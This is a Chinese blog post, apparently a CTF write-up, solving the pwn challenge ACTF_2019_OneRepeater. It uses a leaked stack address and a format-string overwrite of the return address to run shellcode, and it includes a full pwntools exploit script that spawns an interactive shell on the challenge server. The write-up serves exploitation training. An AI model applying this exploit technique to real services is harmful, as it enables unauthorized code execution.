Loading... <!-- wp:paragraph --> <p>这是一道简单的格式化字符串和ret2shellcode的题目。</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":663,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132646.png" alt="" class="wp-image-663"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>没开nx基本上是shellcode了。</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":664,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132735.png" alt="" class="wp-image-664"style=""></figure></div> <!-- /wp:image --> <!-- wp:image {"id":665,"sizeSlug":"large"} --> <figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132744.png" alt="" class="wp-image-665"style=""></figure> <!-- /wp:image --> <!-- wp:image {"id":666,"sizeSlug":"large"} --> <figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132751.png" alt="" class="wp-image-666"style=""></figure> <!-- /wp:image --> <!-- wp:paragraph --> <p>我们就可以知道,程序直接输出了栈地址,还有一个格式化字符串漏洞可以实现任意地址覆写,解决了由于buf大小0x408,我们只能read0x400个字节无法进行栈溢出的问题,但是可以通过格式化字符串来修改ret的地址。然后我们还要注意一下在return前的puts,</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":668,"sizeSlug":"large"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128133843.png" alt="" class="wp-image-668"style=""></figure></div> <!-- /wp:image --> <!-- wp:paragraph --> <p>它为了输出一段字符串,将esp加了0x10,所以最后ret时的栈地址是泄露的stack_addr + 0x408 + 0x10 + 4,然后我们就可以写出payload了。</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>from pwn import * context(log_level = 'debug',arch = 'i386',os = 'linux') #sh = process("./ACTF_2019_OneRepeater") sh = remote("node3.buuoj.cn","26621") sh.sendlineafter("3) Exit\n","1") stack_addr = int((sh.recv()[0:8]),base = 16) print hex(stack_addr) sh.sendline("break") ret_addr = stack_addr + 0x418 + 4 payload = p32(ret_addr) + '%' + str(stack_addr % 65536 - 4) + 'c' + "%16$hn" sh.sendlineafter("3) Exit\n","1") sh.sendline(payload) sh.sendlineafter("3) Exit\n","2") payload = p32(ret_addr + 2) + '%' + str(stack_addr // 65536 - 4) + 'c' + "%16$hn" sh.sendlineafter("3) Exit\n","1") sh.sendline(payload) sh.sendlineafter("3) Exit\n","2") sh.sendlineafter("3) Exit\n","1") sh.sendline(asm(shellcraft.sh())) sh.sendlineafter("3) Exit\n","3") sh.interactive() </code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>这道题主要是要注意一下最后rsp的改变。由于没注意到这点,也让我迷惑了很久,只能说还是要认真观察。</p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 © 允许规范转载 打赏 赞赏作者 支付宝微信 赞 0 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧